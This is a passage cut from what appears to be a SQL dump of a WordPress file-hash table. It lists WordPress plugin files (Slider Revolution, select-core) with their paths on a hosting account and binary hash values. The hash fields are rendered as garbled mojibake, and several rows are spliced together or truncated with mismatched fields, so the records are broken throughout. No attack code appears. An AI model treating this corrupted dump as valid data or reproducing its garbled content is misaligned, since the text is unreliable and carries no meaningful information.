SbP','wp-content/plugins/revslider/public/assets/js/rs6.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js',0,'5{}o7r)','5{}o7r)',' I>% ix~4>\raSA$G+','',0,'?'),(',3I!<]d','wp-content/plugins/revslider/public/includes/functions-public.class.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/includes/functions-public.class.php',0,'-c+,','-c+,','k~ UH\ZxPĀ<;X','',0,'?'),('xE*e˝ua_ғL','wp-content/plugins/revslider/public/includes/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/includes/index.php',0,'{J!u?}s','{J!u?}s','Aũ`97}b>MHJHh|Fj','',0,'?'),('l4Z\\X','wp-content/plugins/revslider/public/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/index.php',0,'{J!u?}s','{J!u?}s','Aũ`97}b>MHJHh|Fj','',0,'?'),('Tw͔\n4Ó0','wp-content/plugins/revslider/public/revslider-front.class.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/revslider-front.class.php',0,'𞹢NRv[w# ','𞹢NRv[w# ','M:/ Q?En$ۗd','',0,'?'),('>TW|Zz','wp-content/plugins/revslider/public/views/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/views/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('|6ի\ZM%p','wp-content/plugins/revslider/public/views/revslider-page-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/views/revslider-page-template.php',0,'yo&q\Z\nD7{','yo&q\Z\nD7{','Ӻ5aɈ0GEXvtWy4','',0,'?'),('O\\)3 P54','wp-content/plugins/revslider/release_log.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/release_log.html',0,'sF~Qu','sF~Qu','$fZB#FU=Anp4&A','',0,'?'),('f2|b5֤','wp-content/plugins/revslider/revslider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/revslider.php',0,' Ջ丒Ȋ',' Ջ丒Ȋ','6Uul)I|{ɉ\n','',0,'?'),('6\Z#iW?T=','wp-content/plugins/revslider/uninstall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/uninstall.php',0,'?I73mlZ','?I73mlZ','x! x!#]O`l\'\"r','',0,'?'),('8!KWt','wp-content/plugins/revslider/welcome.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/welcome.html',0,'$GAr<a','$GAr<a','ȗ _Iz{Jxs\nk>틂','',0,'?'),('Ĩy Zc?YD','wp-content/plugins/select-core/assets/css/img/desaturate.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/assets/css/img/desaturate.svg',0,'<~̠;gg','<~̠;gg','hm p/Gs3ZX\Z{=-F','',0,'?'),('ޕ*9@gG\"','wp-content/plugins/select-core/assets/js/core.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/assets/js/core.js',0,'}F','}F','u\"{\r%5d3K1)','',0,'?'),(',G+[hB,L','wp-content/plugins/select-core/backup/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/backup/functions.php',0,'xhܨOl(','xhܨOl(','C?#U.u#ExIX;Ys:N','',0,'?'),('%L+fU','wp-content/plugins/select-core/const.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/const.php',0,'U#ZwdK\'[','U#ZwdK\'[','?qcU\ZO,U','',0,'?'),('ƌ.C1!LW,\0\"','wp-content/plugins/select-core/import/parsers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/parsers.php',0,'ܼv(=˙8U','ܼv(=˙8U','e\nV\r\n[1>-Qnr','',0,'?'),('Lwr۫','wp-content/plugins/select-core/import/qodef-import-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/qodef-import-functions.php',0,'\' Ҽ7H','\' Ҽ7H',' ?#Ԁr-`% (JȲNC=','',0,'?'),('b(5f_P$','wp-content/plugins/select-core/import/qodef-import.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/import/qodef-import.php',0,'wl 냏=Jߏ','wl 냏=Jߏ','Jbd5I(!`18! cݪۻ','',0,'?'),('OrgNꢒdloo*','wp-content/plugins/select-core/lib/google-fonts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/google-fonts.php',0,'\n-o6','\n-o6','-Q(݃9~rFCEumY~ \\\r`-2','',0,'?'),('Ϲj|!','wp-content/plugins/select-core/lib/helpers-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/helpers-functions.php',0,'Ӹl,AL9f','Ӹl,AL9f','R [**[L\"FA\rf','',0,'?'),('$(sZ\"3','wp-content/plugins/select-core/lib/post-type-interface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/post-type-interface.php',0,'̗,\Z\Z','̗,\Z\Z','LM^N+\0J@90','',0,'?'),('I$?\r<*l> d','wp-content/plugins/select-core/lib/shortcode-interface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/shortcode-interface.php',0,'dI/% ','dI/% ','`Ji/DOD4\'B','',0,'?'),('ω\0Xզ45W','wp-content/plugins/select-core/lib/shortcode-loader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/lib/shortcode-loader.php',0,'g4\"#?-8j','g4\"#?-8j','WUrr ϑul`w','',0,'?'),('fȝٶ.d8˓x̻','wp-content/plugins/select-core/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/load.php',0,'=:؍xj^9','=:؍xj^9','\n]5\nF:9\'+ߋ\\\Zgsf J','',0,'?'),(':[kh','wp-content/plugins/select-core/main.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/main.php',0,'f__.}P~','f__.}P~','7iʢrc>jtrT6#s{u@)v','',0,'?'),('?uN|;gqLh','wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-categories-meta-boxes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-categories-meta-boxes.php',0,'oՃݓc0Cǯ','oՃݓc0Cǯ','g@Eukf+M~Sz','',0,'?'),('iS%|brH ','wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-meta-boxes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/admin/meta-boxes/portfolio-meta-boxes.php',0,'@rI]Q6,\Z8','@rI]Q6,\Z8','r y*Nԣrq=\'&x','9>=\'&x','+`]卞1J\'m.3*B>','',0,'?'),('f\ZDFL','wp-content/plugins/select-core/post-types/portfolio/assets/js/modules/portfolio.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/assets/js/modules/portfolio.js',0,'yUAq@A','yUAq@A','p.AmX#&T \0ËtHF','',0,'?'),(' E :+','wp-content/plugins/select-core/post-types/portfolio/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/helper-functions.php',0,'q|PFĮXLk8','q|PFĮXLk8','&,fw J_-M|*j\ZI8?XW','',0,'?'),('F+a.4@V_','wp-content/plugins/select-core/post-types/portfolio/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/load.php',0,'%x\"|c>.w','%x\"|c>.w','L}BÚwVt&:2@^ Z|8','',0,'?'),('I\r: Rƨ','wp-content/plugins/select-core/post-types/portfolio/portfolio-register.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/portfolio-register.php',0,'^\'K!\ZVC','^\'K!\ZVC','V.Ő k.^ =3\\3','',0,'?'),('e^XT^y\'\'.','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/assets/js/modules/portfolio-list.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/assets/js/modules/portfolio-list.js',0,'3EvY6U?w','3EvY6U?w','vj4yƘ.bE4b8BnOZ/eF [','',0,'?'),('Ҫ\"\r=\"ʜ-','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/helper-functions.php',0,'Rw}>_(M,g','Rw}>_(M,g','P\'3el\0\'?78[,sx','',0,'?'),('#c\0tSh!h~A ','',0,'?'),('>2T\0N','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-overlay.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-overlay.php',0,'͈s\rQf/\09u{','͈s\rQf/\09u{',';?d`Vq\rY;a2S S٣z@ϨM','',0,'?'),('8ևKXWlS','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-slide-from-image-bottom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/gallery-slide-from-image-bottom.php',0,'\ZY=|ǁC06','\ZY=|ǁC06',';?d`Vq\rY;a2S S٣z@ϨM','',0,'?'),('%\rF\"]2-/','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/standard-shader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/layout-collections/standard-shader.php',0,'tc^սc','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/standard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/pagination/standard.php',0,'\rñ+O}Oj\'','\rñ+O}Oj\'',' ֎tYg5*0ѕe=7#','',0,'?'),('d02e\r5\0}\n','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/excerpt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/excerpt.php',0,'_6\nEw0Ѝ','_6\nEw0Ѝ','2߽`}eҿ*6 P\"./!4x','',0,'?'),('#9o[5 ˬt%','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/filter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/filter.php',0,'t\\[юoZ','t\\[юoZ','DC\\AdynmxDVZ>r','',0,'?'),('QkFPK[O','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image-gallery.php',0,'cI+xΊ ','cI+xΊ ',' |Ya+ϥt./ (Ne','',0,'?'),('#F\\KG','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/image.php',0,'1/r Eֺ׮','1/r Eֺ׮','c\\t9ȵKH=A/','',0,'?'),('QI/IZ','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/images-count.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/images-count.php',0,'aYa!T\n','aYa!T\n','#\"0J[ ƥ$Jdz\Z?^ddh)ws`|','',0,'?'),('WLZ텥cTҞrJ','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/posts-not-found.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/posts-not-found.php',0,'@#3\ZT','@#3\ZT',' QtKt6}Pq-2Zlo','',0,'?'),(' 2e\n=e','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/parts/title.php',0,'z,; Uu\reGe','z,; Uu\reGe',':vA4R,Z(fWަy+wxM_','',0,'?'),('`Q%mh','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder-masonry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder-masonry.php',0,'݋ԂtF㍪','݋ԂtF㍪','\n Pņ4.lY0IЈ]S','',0,'?'),('x//!','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-holder.php',0,'҉~}]','҉~}]','+;jɗ~~6͠~t Ez','',0,'?'),('ld%Q\" z},_','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item-gallery.php',0,'݂6(o?n','݂6(o?n','B%>CC(ettC l0\Z\"n','',0,'?'),('QoƲ5|.~','wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/shortcodes/portfolio-list/templates/portfolio-item.php',0,'<.ͽ\r2','<.ͽ\r2','.5O\rҲ_SY zJ1w','',0,'?'),('\\\0P','wp-content/plugins/select-core/post-types/portfolio/templates/archive-portfolio-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/archive-portfolio-item.php',0,'WC:j@kK','WC:j@kK','h>n~ 5ӥZZDt&;oJRv#hx','',0,'?'),('=v[ډgF','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-full-width-custom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-full-width-custom.php',0,'Lpv5KQ ','Lpv5KQ ','v1 W@b_Oj8HnNK','',0,'?'),('LjDSRv`Eg','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-huge-images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder-huge-images.php',0,'bB ʓҡ7','bB ʓҡ7','v1 W@b_Oj8HnNK','',0,'?'),('FU/]˲T?','wp-content/plugins/select-core/post-types/portfolio/templates/single/holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/holder.php',0,'U\0Vi','U\0Vi','ϴPC(kmMy^:֞Pb(R\"','',0,'?'),('WPli\rx3','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/custom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/custom.php',0,'eGG_?R','eGG_?R','WȽC\rT $$$`b =rQ','',0,'?'),('ppfytE9%','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/full-width-custom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/full-width-custom.php',0,'eGG_?R','eGG_?R','WȽC\rT $$$`b =rQ','',0,'?'),('V#Nym+!','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/gallery.php',0,'2?![tl\n','2?![tl\n','7m:fؿF)W8&])pyK','',0,'?'),('‡tO1,','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/huge-images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/huge-images.php',0,' DP-F P_#',' DP-F P_#','Xm\rc(ejaPt@wK!~3','',0,'?'),('vuGs,z}5','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/images.php',0,'Q\0_*B^\0Q>','Q\0_*B^\0Q>','-8l`]ħ8s\rhƆO8K','',0,'?'),('z\\CO.\\)','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/masonry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/masonry.php',0,'\0؞4p@/','\0؞4p@/','Y!gu!}=D8\n<','',0,'?'),('S 9`ѽu#=w','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/slider.php',0,'U7Z\n٣B','U7Z\n٣B','ИݫŐEQLÁտUKN6e','',0,'?'),('o@2dwj6','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-gallery.php',0,'UyCNl{iQ','UyCNl{iQ','m#)\'jr+ԗnI^;','',0,'?'),('i\'r(','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-images.php',0,'A8WX TFlJ%p','A8WX TFlJ%p','VSԽ eNer\ZY3!','',0,'?'),('If.O','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-masonry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-masonry.php',0,'q#FƝ&WQ','q#FƝ&WQ','Iv\ZEP,0W_9ho2WY[X','',0,'?'),('@r;rbK','wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/layout-collections/small-slider.php',0,'Gz19\nE','Gz19\nE','15*\nT\nw~eZl$HDz$','',0,'?'),('Ilt5 9Z','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/image.php',0,'\nP |hyv','\nP |hyv','??(bw DYKЂig?*Z[','',0,'?'),('F0p ','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/self.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/self.php',0,'\n\rYwuY>','\n\rYwuY>','2I8I*ƽ󖂈%\na1','',0,'?'),('u=i2?99','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/vimeo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/vimeo.php',0,'9=^sK','9=^sK','7\" VXpėA`Њyoҭ0\"','',0,'?'),('\r&-=3R>$4[!','wp-content/plugins/select-core/post-types/portfolio/templates/single/media/youtube.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/media/youtube.php',0,'G:|Ůz$hW^','G:|Ůz$hW^','LK3` ˎiL\n\nR~','',0,'?'),('*v3-)!I','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/categories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/categories.php',0,'f \\̟X7:','f \\̟X7:','n^ 9YI\'g`\0?*azH+\'\r\0','',0,'?'),('+Q \\՜t','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/comments.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/comments.php',0,'m%rz@S','m%rz@S','w^ڹE&q#;JJ@Pc JR','',0,'?'),('!=丸OHM /','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/content.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/content.php',0,'ݯcQ6\'U]','ݯcQ6\'U]','\'Xrfx<6C}tmdT,s','',0,'?'),('+ >yFjۆr','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/custom-fields.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/custom-fields.php',0,'`+S |#3\nw=b','`+S |#3\nw=b','YGX_JRE5XG{߾Rh26','',0,'?'),('\ZA2\'t:','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/date.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/date.php',0,'ca\rӾ).\'UN\\','ca\rӾ).\'UN\\','>\ZNj[Ib*\r ̑n','',0,'?'),('yTQDSYkr#','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/navigation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/navigation.php',0,'}(\'̃d%','}(\'̃d%','c_JhOt `7','',0,'?'),('ǦzxrPP','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/related-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/related-posts.php',0,'sΩ>!o*YеjW7~','sΩ>!o*YеjW7~','O4+^cX\'\nr}Zk7','',0,'?'),('aN~rG$JqG','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/social.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/social.php',0,'A@\ZzĿ!','A@\ZzĿ!','\Zm%TcPJO\ZDس2I\"9','',0,'?'),('4\"LN*)','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/tags.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/tags.php',0,'adOh?+U','adOh?+U','\\:0WN/\'6i4x\0t','',0,'?'),('\'`9̦','wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single/parts/title.php',0,'P4/D','P4/D','mG1NJғW@fKq޺g,\0','',0,'?'),('f~N$-O','wp-content/plugins/select-core/post-types/portfolio/templates/single-portfolio-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/portfolio/templates/single-portfolio-item.php',0,'Je\\knO','Je\\knO','Aխ} \\1# 58؇ ','',0,'?'),('\r1#5c`*O','wp-content/plugins/select-core/post-types/post-types-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/post-types-functions.php',0,'SV9\ZY\\Pև5\r','SV9\ZY\\Pև5\r','RlI|ZZ_','wp-content/plugins/select-core/post-types/team/admin/meta-boxes/team-meta-boxes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/admin/meta-boxes/team-meta-boxes.php',0,'ϥ&\' ~','ϥ&\' ~','\'xeB[Wmʇ)eA&+3\0','',0,'?'),('tFK|̓','wp-content/plugins/select-core/post-types/team/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/helper-functions.php',0,'0c&','0c&','CX]0R74 eGw','',0,'?'),(';HǏMz,]QC,:','wp-content/plugins/select-core/post-types/team/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/load.php',0,'g)gW!8$','g)gW!8$','ꞛ#KAAn{\Z[ۦ\0y|gB','',0,'?'),('\r8[\"a GQ','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/helper-functions.php',0,'9rN+)','9rN+)',' Д8躊7~X3mv','',0,'?'),('\rή$ꬣ','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/load.php',0,'L6*D|>','L6*D|>','rx15s=J\'uM\nU h;?','',0,'?'),('AH `Bo\0\n','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/team-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/team-list.php',0,'@6א40w(\\','@6א40w(\\','XqG1rK-N8a{<;\"','',0,'?'),('FƵ\r.(f3R','wp-content/plugins/select-core/post-types/team/shortcodes/team-list/templates/team-holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-list/templates/team-holder.php',0,'A\"P\'%=#','A\"P\'%=#','f5>2[?Bz?@P\"','',0,'?'),('^pݵ!b','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/helper-functions.php',0,'d10_i\n\"','d10_i\n\"','-[BN=6.̅`Tt03)\'[','',0,'?'),('\0$i','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/load.php',0,'WX\n\r\rD','WX\n\r\rD','| c\0 PȈkrL\nWysT','',0,'?'),('ܖ\nf<|P','wp-content/plugins/select-core/post-types/team/shortcodes/team-member/team-member.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/shortcodes/team-member/team-member.php',0,'IyIYީ|%Fr','IyIYީ|%Fr','>O`&{\0,?#9]hSE4P','wp-content/plugins/select-core/post-types/team/team-register.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/team-register.php',0,'HX /)C]r','HX /)C]r','|\ny TcE#d\Zk:H9yJw ','',0,'?'),('7eы?^Aӥ','wp-content/plugins/select-core/post-types/team/templates/archive-team-member.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/archive-team-member.php',0,'?C\"\"ieqQf','?C\"\"ieqQf','\'wv9a:3lg;zi~@','',0,'?'),('tv׼dw','wp-content/plugins/select-core/post-types/team/templates/single/holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/holder.php',0,'eB4','eB4',';Y<<Sbf]$','',0,'?'),('$rwR2R#NPb','wp-content/plugins/select-core/post-types/team/templates/single/parts/content.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/parts/content.php',0,'p_ Fα&\"','p_ Fα&\"','Z,:Qzy\n=▌̇Nne4@','',0,'?'),('܇[Cҳj','wp-content/plugins/select-core/post-types/team/templates/single/parts/info.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single/parts/info.php',0,'ɥꄓ<ġB\0G','ɥꄓ<ġB\0G','=^CWGHlN@pF|\Z','',0,'?'),('esV','wp-content/plugins/select-core/post-types/team/templates/single-team-member.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/team/templates/single-team-member.php',0,',LՇaw ',',LՇaw ','#zV3ON7bD }r','',0,'?'),('OFavE%q?','wp-content/plugins/select-core/post-types/testimonials/admin/meta-boxes/testimonials-meta-boxes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/admin/meta-boxes/testimonials-meta-boxes.php',0,'\n8`@q}}','\n8`@q}}',' .,d۞_#f\"1','',0,'?'),('\Zdlg4','wp-content/plugins/select-core/post-types/testimonials/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/helper-functions.php',0,'BBߤP','BBߤP','c7[\0tPm','',0,'?'),('eÁ\"i\'y .N','wp-content/plugins/select-core/post-types/testimonials/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/load.php',0,'mEXL\Zoy|:','mEXL\Zoy|:',',+z9s\\c\rkYty_ӊ7Y)','',0,'?'),('HQ*:,^w','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/helper-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/helper-functions.php',0,'G=٨MRUƣ.','G=٨MRUƣ.','6-SxI6:*~@;W&,W','',0,'?'),('!0!}m','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/load.php',0,'E\0{4Dwb^B','E\0{4Dwb^B','@S%i\"@㼰o1d kk [2','',0,'?'),('\0hIP;6\\','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/templates/testimonials-standard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/templates/testimonials-standard.php',0,'nj*6B','nj*6B',':ߨ=,TMoŋE@^B()','',0,'?'),('>> =Bo\'q@','wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/testimonials.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/shortcodes/testimonials/testimonials.php',0,'\Z:f~lu','\Z:f~lu','ˣ{S-Mkm~x\Z! dc7p','',0,'?'),(']s;,sVȋnM','wp-content/plugins/select-core/post-types/testimonials/testimonials-register.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/post-types/testimonials/testimonials-register.php',0,'FMoJj=U','FMoJj=U','\\(@4?ᜭTTe','',0,'?'),('LC\ne[L','wp-content/plugins/select-core/shortcodes/accordions/accordion-tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/accordion-tab.php',0,'9Ψu_=+','9Ψu_=+','nVq^/Q); 